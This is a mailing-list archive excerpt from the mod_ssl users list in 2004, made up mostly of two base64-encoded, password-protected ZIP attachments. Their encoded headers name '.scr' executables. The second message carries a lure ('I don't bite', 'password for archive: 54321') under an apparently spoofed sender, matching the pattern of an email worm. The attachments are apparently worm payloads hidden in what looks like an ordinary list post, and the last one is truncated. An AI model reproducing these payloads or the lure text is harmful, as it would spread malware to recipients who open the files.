Eovgso/h8hVxnSHdFLxYGh3cPGEjQU3asDQUlw53/yj/2qv51hABoO+NK1o79lljYiWejIWK
5ZSnu/qz8o0MxqRL4UI9Y0h5UOkSdWwFhXn6r9989YHytdgM7J5NlBqInFJJit7Q+/l8M939
vN+4+t9NFzZf+nsUktb0x1lBhLRcgyJRPeZaP7XmbLrsUnD5aKVaBdLxDuZoc2yhKjtAiOXy
0z0LInr8CRpXg8azz+Hy+1jIYCVwqdphzXuK+JV7kA46ZjLT9QK6/wQAsVb475hiMZ0/2VJJ
tN0J1vQbOHhsChut9sJjicaS14xqfxYkFkv0onhv+N7JW8xe5qLlsFrf+IhRVYoG/+0TpDPH
spWpiKhCYAkfsHL9mQcJeXFEW0yxiXrKhNlBQ3chyha6WmKZzG7+/1fs5rMp8joh55+qJDrk
u2aIbOBjqRXBygeTtzbJ9JNL3kYbjhWx+SyTk+lg288vPb/5S8aIJESIZkq083vS9q9fFUQ4
wWgJSls1XqmIqhsDUxvXc9z0gn63mykuB5lMFF2r+0xMZKCIWjsyA6JcS1awMQoqSJWJxIKF
3rPShiukBN/lX4TC5m0QYMgx9bjbIGgE7BEPiIy8ftLm5gj4lzPBj3DORxmMZX8rFOTjo9OB
WMthoix8SnJgYw0LPHB19wkPZtcf44BeK5LjOAESaXmdUFMKmGIG/CUeITqZv5McTHnZsjZV
7djSZOYar7t6nRvPfVRguN5FEHFjgoE352UlZMv4T48T2/MmU1W8wCW6GJammnjVHB1AW+R5
l/1v84kjsqAFTYTuwxQdpZXY+STdmZncwsNGQvjtQaEl1r5hBwxOmEuAlnWSbDaDQoNwu/Xy
zJFaTHe4WUKRM+iH9oMpZKB1DbGWbdOHPSwmhc62VBzM6EeVGp4sPGP4s0fVN4t/x6NMdt8B
PTfogeZZ+sFLKswlIb/DfTI43Vs+G4rNonXDsfNL9IoOvvLJLzxC+RLsnK9eoDP8EVUzAzTS
7ULiMV6zm2oCrD6KtHKfYVwLn7MscWJZw6+OI0JcZtXpb4RSvr8ikBxk+w2eFLsd2X2Q5Kmt
F2MG8h9ZYogynG7Q/7QP76Bocg9WtCSCmH/nn2mNBa4DVqrVRbAIXaaSUL6UX1xi/iroeBLJ
IDRHWVS+ezKSuW2dWBTnSHvLjRvaYMqXQaP1Moy1cUtDE/e6KBemhRxDk3GbkrIigDoVhaf4
hkXVjN75hJceMp4KH+K2CLVWSrLuko8m7vtEhhiAawzyV3Aj34kRdeV2D1d4eq1nvo2wai/O
zCKYLOW+yl0847Au8DiZ1a1jpKz8C1hvcfrda+JKsqX92JhKCUOAdmrLllu2hGy4xW/YVXkT
XdZUchZY+dmavzYLGcIF5qE+he4XqEqmRvnfUowsc1DYhXkprw9jSkqaUqRMNYGjgVQICqyE
M6sleZT+FBPr83j3dEr/ETFLD1SgNyWllf3DbEMttPsCp0XZ0NnuE8tV7jZKd+adPcBdwgro
mHFxP8sYdgfA89eAbxLaZWCKBs/BpJTf++NPyd0l79K9ZTLDeXoiATWtWRm6Ny7N+UV74O+g
9Ez3BhURnrvU2Dp8ANjbPjq8nu0Rd4VxqyNxK6ZsZcWNoOsFCxD6dvCzhFiUH7vBYpfTeL6O
qlt1Ac0NrskQObf5OwwAX2qiGz5mEIoNh9uX2z3X2dndRQWVEfpSk4SOmgAJgeECxCYX3jQl
tcjGBxFm2AqqnU88iY+W+ViKrTsXGcg5kmZML8GlimlgapXCj1U2tO3DNpDslP3ash79wWb2
KMsMxZVkpqTHytIaLFqN2pFA3Pj927iqVZrmoc/NP6X72LYUjZMwN5aYCDT1O2xvmZx9fHRw
lPam9sWiCMBEydc70YIFWqL+QMwyHyqLvefjx4pqzqiPXbyfm07qOtM9lMPs5N9shnnhdmLs
gZQ4+xGUXQprwqlyDZ1qWcOlHVCkyEgkuQRaDmtZp92za0CfT1qCVjjurh+gHlLPg1lfNcKv
i+oL7RGZAix9znJ2s7RfIjO7A4i3lVf7HKcRTS9SAEoxc21AOC2ZtzrGXELthLeGSmGaXxxY
ErEe15yP6Hqb0crOUum1Yl2jGkO3nBYSGW85MJhzTcsxogKCzJkxGeFPH8uB2/tX1iQdN1ng
lipymFLOxtM6reh0St8iEOUasUN+2+EsRLbRVqmEeM2OEQhuyO9jH8CVtqDaWQHSQfROsGlW
2tfkflSs4hKFX4O89eE3dTg0rX0ohSP+jL2Hywtm8C+dg/6r3L8vS63EG2hZTUNP64VcWhUM
8tRLdJwZuzIMNjG2RlABRbC9nEW1NtC6ie+61eKpmbSISKOYGN7dE6QP6gUN0O53LuJPBksN
W64v11AIfBEnx2M7psvs9COvZOjI8+2LLSTa12Xm7NGFHJ1/lRWscQE4VZJOyEMk0IVDwz0y
fPGJiPzRrIG3cJBXIs41lzYLAPH3C4D1CwoWhI07LzLyoODZa9AasrEKtYfN15iStxx+atyM
3lH2U/Ox19GXsqx6c9lTiUZ1fR0i8xia/jJF4osxi4vwROQw066hHrIWZSMHT5UVx3/yNuYQ
EayMV4HKiLN914KISMaKACnz800SBectxGw9BWv9Gd8PNkjcEZMZZF0AGy9KElw60ThO2aN4
J/m6Wys19C5N9qFGlHCi2QCnE3yIH1tgP5O2XOThVhH+4BNjzAwA9gdIuRzyAgSoascTx27c
B5kLRgT/wZf49N7YXRmuPPGhCtik827otR27o/+El2hM/AXWBjdAiT2G6/T7yyBZfcLdfXqW
ubQVygE4z3fnq170xsPYjI+6o93Ao25UOaSpzOu8JGZ3GRuVkEAKZUl6afe1jHhsBRF4sLhG
uvwy25eo9zE0mv/97J1CF3NqL9xU81mUM4NQIfXjOlnELzcslTPkSuJ6d0PvyUYotBzoedyT
jri6kla973M1i43BLX5YdEo5ysS2ZKD8N3UvH0mxrGMzLhxR/hkQPSflqwRvOYXfIETvzKrb
zbQ2Em4PLzrmBRR8Cfhafb89H/1hld4OfV5StAvmvhlSeOPbVdtWjCj8trxIp3uKF6LnTOzV
CoQDytiOVJsuRcRU8X4Ae0Zidqr8FESLTohu3hKWmLI7YjZeUAvCZSFEzPGGdCQYZs4ub8Js
On/n31OiFgCHNBNMOB/zGAueQ/7hWEcvNIeH1NpdK6SL7Q02Htx2KyJrLEfsXdn+KaYC/i66
OZVV3Vv03qxfRNn25bRt17LiBUzp0DDBWbIl2Rf9dtJozyzju6mjvr+RsyYh5rshHHcWdRo6
ME5Wbbt9HlRE6bddaSMfhIvhKziKcN0ZKo8rk+warmZ2LTjLEuIb0XaZqJcLBh0KeCL9/yKe
23+T1dFjz3alyQPWcJPmMmwqpmli/0TcWvESpgtzG1AwZSk40rSFLTDFxbsMiiBsdWwlnepr
D61CfSdmeWYQsvJQAQi3/uLFzBBRh09ycKEQ7WMqHenWSca/hGg1Js844gpH7uRtX4MiDMqd
NaXXjGoOXQNmP775CdFmI04BMhy+exY7cQZbP6sNNx3fTKSQjU4T8stiVDvRJL7mcicRBwsI
1ynr9O9tbgPlAfMBpN/S81QYrv43Vu/OnIsjd6FzgLh20nnqEkXsdcd4rLeIejsGVp24s/2q
Ioq+Q3f3n9xdfZ/CTyFKB3pUuGD4pJCEsl8zQukVL6XQnWllQerKrmjnilg/Vb5Uh7WL3sJP
YJY59cDTcwnIQsImtZvzsqdpZqXhVGaDKEqk518WgZnaAakvxMRyVSi1RkWGT1K+j8fe94WC
7Mj4RPpz/Ig/dFiSo+BrOEdAchdqtyHQ5Pq+zgRrKgjMY0wM75vNiXuicolbjOic6hks51ti
VM1innewQUju7VtJ95Ci3ucpBTHnSzVyDeyQBi7MI/JmrTsviH2s/XR62v+gOq7yqP4wfQeb
jwheCBi/wAl3T+5oaeqNqh7nldRvvdbgAXOft/YT3rI7EZRF63cbdXRO7uofzmJZW/YR+pa5
w3UIhTusfydm1+1K8lZlAqceEBPKGAxVZTKjjrm16cKbea9QvK5Ejf6o/fqW6eHEpIOd0PcY
souQJjtEtd95rxOjAnDrxc3pTlBThs+iGfZ3VN4ZwDlSUAeNjgzBxxUGru/dGNOyhf48HQYm
GtmDvsFW9ScY8hNKnY48EdgG4ot/dU1BtZ0QUXCGPQp8S6VI5wYpXlYFucFinAvW4R7WaBXW
IxZ/M3xUPCVOdMmMBcEHPsFMK7Lob/7wvTK0Qxd/7KqrprS1LmyxRm6QmeYKqFtAK3ZQhVwU
k4CZZg0ESb6qjMQgFKrAH4Ko1gRT3QqzA/wXZpFQqhNLBAf7sYiLvmNFTZRLsO9Vg90dwwD2
lVKVPF02NiX6BN6m+WYAwoFko+Yt93KnAQ4nqHBr/RvVxX/e2lF0wQTNLuJSSJmiuBnSB7SL
fQPYKNrR+xRY03VMuwZyLZykKgHaIKlg2+MEHeexc58xgjsGNA9TLUryI6StLd9eucLd+Q6h
LuGFJ4PMYDf1mOZl03J/5hYAfNd+YKDwsbTqqHz8PJjUNAHwjEFoeIfd7dDjZRsu5hTIMBNT
m8KVG5cB+RswdYYG+KbD/lDC7xipM36d+7kBXpURq0rEZKB3itp/ywcksYu5rdbvlvD5Govo
v2WQ+r3PgiIqok8ObcfJDU83cIXk0iYe745T+wEYiMbVopO0KcjbeSk15/P2uIvIuBYLQRi1
2Z2xIAqOzX3Oki+xbLL/5mCJbMYtK27+EcA3W0RjCOm56syMzwK31voxrixPpW1RIWL97Dzs
YTAcpkiG73095D6YFt13BM7UUiHdulAmoNBo2GBD9LH9Hl7A0jMyp22+YK7PrvCnUmCQV7yc
r85ghHZ+RRYPDQmlNGvcdZCS16TRFe6rgnDOKkHRMQFuKjHJMQnofnt0fjXDG7V/ZElVYcpp
YNhpl3RHmVioZ+mZQ67M2e/cUVNg7r01haJ8fwxuwDQ8PUk3/VuQAMcSK38HEwYq3RKdfFLV
85tizKJr9iRJHAIhJoMcBPHQKa4+c5Jp1ChusPE15CQJ3waG9etl9uUmzmT7mtSbjFbYj8Dk
f+2JLudu5d6qCuW602WUZgTgRGNSXKgRrEAXZYeurhGNPEEGfXpFiR635UPo9uckz5XNNi59
VYxgD+P+g8ucpAVhbz8B2BOOPGBZp9jy/FFP2FqpgluLl37jGXAp32iqEm02SSbhuSfz3s+5
ex5xO9p8kj8BbAXqFrbfdcjDe4k4UUtGG5bSPzAmJIUuWr247co6nAjhY/F/51vH3If2QtAl
8BmWhqcYL94IOZ0BAXJK3MHJq6w/ssJYditsBn2np0j1EP8HFqD1jkM2TYXuA1IPShCBMMYu
j9AbccFPIscWMsDoYk5hr8Ur2YlzDQQh51yDJqnzv2Wk7OTJoxdgNaXt3jkQ+R8M79x0xzTt
JrczDO2KdEuHbDv8mRxEwJ0ioItqHaRxO7MpoxEZNaIsK4Z0P/efUJeiSNCq1tkIh8yjdPR5
f1wdYIBeIGll60mfFNxB4bFQ5aafuphg/Oc5rtwgTM4uy8JKXvLpoVpYH2v3f9QAnCNcqo/z
ItB0gIc30Juud89Cg5ldNIfyaASTUQywE9GBo5ApWcOm+xEfV6/0lIZXmJVBSom+pJVAenmb
1evgBhNzpBd7ICoyjrUMj8hcYQO5kQmlBAYpFTD/7s5GVuvz+nCr35mU3VT+CxwTok9rfsS5
7yM3L2p9VaRaq5rZYkeQkiLkp6hjdhXJCtuF0PIBagednEznYnm+U5UTjvnIG5gaNwAGssNW
9EFWjMUlx/v0taReow8CNV0gf0YnzHUL76rDA+yHC96CO8cpc54YbqHQrCMvXNea3NJHxbac
99r4HvOSETrK9mzHiQGbHUD7AotjfnQy/UYzl/g4q3gwCyD3yxPpt9s6c89clLXCnwmxXcp3
lP3zEbs1Bje0GEGfhb9fHyVD7uuAIF1s3VEQzJEfApXujAK8IHdTeeiIU38JRCvfFyawCEi/
uV3F36svbpowREsoO7PV8bxinAlA33OWva2a7jtcmXDzHIWED2qNwCtBizoZwSDcfC4UhQ52
udllJr2bQ49KS0SIrxoKSFz3X8xmkxb6Rn0GY/k2wB0eoommc+3yiOzF6aAG4UbK7liM3oVN
HHfvWwv0IBmMGBkKNyVfEhj4u6slo6CHIvcQYHie7y9BM9ahkZcauLblSTYG/VfC8HgAtvgK
qAnDKWG3EHL3D/mKkT9zQpcTWGOgyZIq8PehxGpUX3YsSE9DvSYGGqCn36N0WL6cg/KaYNlS
NHPB6Ir/htx9zSzMLjy3v8bViWCCm3umG1IyLgn/iiPv7HVJQ7ZfHHRfIMIR40Q02UO5YO3/
kOyGijEhEq8oH7X3szWwAmzbnYtZI0VHPuw7vsHtY4GhZajJm9K6iOlG/2VB4d/2++uHH7qP
LISmyUQxHCcvFkdgO6lGziifsq8fpVv4iMads/M2nJ0eD4ZsuFxUDF+msRwYypJQsLzC/jTF
ueOfASlsQ0rgiuTKmkPWPjrUncdAeNQfpMUZ8FsB36A5ZOyT+Q+8SqQ6mKiSZS8ih2uRjOou
bDGuMVVQ1gVVBuXHS2VyCdBmJO5gGQkgAH1Z9zdUwI3v8PCMmOmaCd+nVFdtyzvCfUJmLkLT
NORH/Tw9b8wThNH6qR5pFNdQ/kcMHsZdLZjtY8o3SzYspL6XJlvquHnE9htze00MHtpDcAq7
rkK6y9A13Lw0Dglh+kUNDZgZ6nvz/YziiI0alntGF7lEBN9hdoq87vshdwhQoRmV34J6g6Fw
lcuLZnKia4iHLNSUMhaj18CySooIgLtEom/wSwLG+OMuo285aM9l6euEBZA7WncQREYjTn6r
ag2UfhHrrj3kjZSKaYSE1sT/v9+MwpjAvZMkQMN7kZcGu63kpDPHQfNQ45KC2fHPTmKjCCGo
2DnDO4vkOnRp6g4oOxnxbfua16GQeyIbJY8YFPiqil3hNmZLMlPqzi4pRFMq6M3oGBOL3Th2
cuKBGXJMLEaL7HRSM/B0ulVzUuB1jJu2aqcee50xQtO2iIdHVC1HZUywh9S65tX59kfhSxHj
cYqRuCdlzT9YNN/oNv5EZmeZ5WPtw42gjmnaZyT07OiOAKGfY/9Mik+wGEOx+lIcFYEy68ok
RPymVwZLUxad9jlKY1DgLWEm42t1o6X4ERU1Is90AhG4/Avt81XmoXdWWFvi5KwJJdoYpbUz
MB/5vfG9P22I3DRQHmgJcf8V+O7xLdefWXUCsa2Yc/3RHzjWtV5WPvT7mok5+LrX6SAyvRoC
rSYwXVvEtN1ACXQ0QuQhlyTcN4GdV/mMp13W2APp/UDx01/2IibkH2hLf7GO/JkNhsy7sv1A
4eosnTCsZZLm0PDsYhFHsthPlya0XJzJy38WYb7GRSv8paNxv21n0gR2pBic4VJhuVpR3icq
Wcb9JM3q2U5SgxQlkP8Bs+KTjN6djnMA+alZb2A0SMeOIw44aEfQS94MAANQqh5Jxzl8pJce
qMzRATNRFpprm+fJDR0OQNRAMiglyW3xIzaJxko0vxiv5ymfY/nOivaBfw6VMpkRR341uPKA
rcLr+fwGqWVIFofrytCkG+lsP3j8WJeg0yNNHbtwiLmINxANDUY7P5xCfy/8tCs61hiSHT7j
UsF9CEIEsVton4iyjj75mpVaCZVWJGDJn0saT+dkUwTJBMTxydNFPGNO49Et53JXzwxQt75K
UWNj9qEBSAdC9JH0zebKDSE8YAXybjgm9GyffoTycTdrE2r43q/dKE/hSm7707yMP5GxNJyp
MfYtlT5Mc5C+Ghhj9i5cY9SMjrg33X/D2qv62oSBhtdc+4FqVXvVHdw1W2Mpd52SYBmKghVQ
qct3GrIYK05TpqlKJGIS6dWpET+n97ONn7aO1tH6kdnQ+QXc9o9YgbIDVzp1GCCmpanFW5Mi
HeSereunS8EGt0HtnqbLtQeX4doSVifcvSMMJXmo4DMR2PuvgB0+v66VWbliwJMxjs5uWcrl
Pr0TXGPxP4QNmnQyzLXwNiNSY8aL90ind0XxNY7W3YzoNdXo2Tp12A9hQK1JMng0qmlYeIrW
pfMxTXV3ENc1N6mIWobEGy2la1Ai9eCM1Hg41/u+vCQ/s2+dH2z+wCZuXtZpxL24zuN7hDgj
bcd5Nc+l/zDTc9J816t0n9D4XiTXmj56TTknjpGUnICMowG0ucSE3ODHw3zdiDmm/UiFTqbe
jpQ3sqTfwdsapcG4ZrKVU6PJ4bpjqg+Vw0O9L6kdt4gHX+xl3gU9d8wqNn3WVjgfHlSup1sB
sjGiT4c/g0JvwdpznEWUn5zQ0T6EoKtWp/wTzUapDJy/f4erg5fKLarq4Mnd/KBHJFmNaOn6
APgw5mCUcoxt3PhnThWPSHStJaNs2Tornmc2Pfuy/yxeBH2jtR0OamRQh/isEhO7ayOp77Yb
C/MyXp98cIPpUYMrKF2ym+2JShMoVOpggNiBANVjJCtEAgnMUOqBIn2UwSRd59+IgkzG+YD4
3Qf//qmaD2/PavG+/9R/mqICwElCF3yuHXkv25r6mtiaNqexcsugNG5wtE3yZf6kiYmLQdFT
8tZOunBOG2jUZO7k7VIMdp6y/Qm32CordCV8/0BGt/Zb+SqqVogfMbzOFNRNXJPSOMiyrRdP
Em8fL8L1lyCmxZtCl3J67y9NV5ylBoTVHUPH/5iXZgz406ue8RKY1vUe0NhbevuE12hM+cH3
LjIIP+lIQSXFxZYnvFBiAsKfgyIBhWuj3hll/XrHqXlCkKEQ1kzYmyuH+HereYpXEaAmLZd0
ZOd9PEWmzYGqIxNKakxUYuBLQ8KxzZH1/DcpP8ki80aDd7Lnh6MlviESczUoAN4ZNM15wX14
hjFGBmKC16R3WNWD0//2jQNm3PeTaEE08Q2vDmo1ZR2aBkP8cqVspvGvt2OBEgNTNpgQmvYX
+wrHZ5vrET9BrcKzGV1cnKuHpDwKFdTc0/orXHq2ZV+taM8Bz5I+haZRHHzmv8Sogo3Ac6vt
5yEbwEwB89nhrzRdaogAvZ3bpisrW1IAOi4E3bcvGAKLp8vD0fwt3dMNuL5mGYUhtvbU/86G
O+pXpNFjQDfUVsjyCuqh6PqGhwSmyIXlX9x8r/jYlyaVj3NIYS3E9IWUYRsdNFzrbekPiMiZ
YPJ3prDEMEMeXOrxlH3hK1jiZQdHKp7PXAVZYrIjwZ1X0OelnRf0wBcylKpR33Hh2f9IaSiU
qk20bAgEuvv6LIo7dF7tUSrmOiFuMMmaxC3gy7+m4hOnWOfTplQ0wg4IRWfPow8/r2blUOe/
1IKVq+vuaS7ynS6nVWIW7CmWQ/N28ZZDI5aA8y6agPaIttBL7lHI2gjlypEIZDqc/KmZEoKJ
N1Co09wSAnvX7TEMvWkLily1qH1cknauwahM9cDJGhqTvAlcZ4gyKBnsei69crv0P96sy9x0
Jnp149E9eKgrJuLil2wjsfwf37Qu3VIzJVv4QKNHYwpSVYVzqrqhzXEPLGfv/zHWdmQfq8gf
mi3FbuckbJbVtlglTzHRsGzlagO6MHgNr1tJRn5/2sOF1w+yE03TLTQXTbpfHrwW46KtjRPA
N4EPemmUXgo+7rTHpAxyXzQewxEeVPyQR8/L43NUPMX8dgErBil7WBuikbQ4UiYvXwAT4+Oo
LxHPQdW74fjZZxIovGN06PChUhfwn+5+bLgtj84KhBa2FY/ElQ/frZzOc/77ckf/Fb5CVMna
+vGWSXMnO57pAO9e92w5swbODNtdiP7XZ7bi9gynTOobLiQv0UyQsvqP39LlQxmF1TaErdSP
IR9GdcCGkNYhdSeoMmamLU2scuy7tqaCjxTsML8KNGeNclBLAQIUAAoAAQAAAOBUZDBDNXnp
IVAAABVQAAALAAAAAAAAAAEAIAAAAAAAAABoZWl3a3h0LnNjclBLBQYAAAAAAQABADkAAABK
UAAAAAA=

----------uvmihhkjwkvwsgjtjjym--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 20:59:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82982A89A3; Thu,  4 Mar 2004 20:59:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Chun-chieh (129-2-53-170.umd.edu [129.2.53.170])
	by master.modssl.org (Postfix) with SMTP id D2DB7A8938
	for ; Thu,  4 Mar 2004 20:59:16 +0100 (CET)
Date: Thu, 04 Mar 2004 14:59:15 -0500
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vplxfqwjlmfrgugrnvca"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vplxfqwjlmfrgugrnvca
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I  don't bite, weah!

password for  archive:  54321

----------vplxfqwjlmfrgugrnvca
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
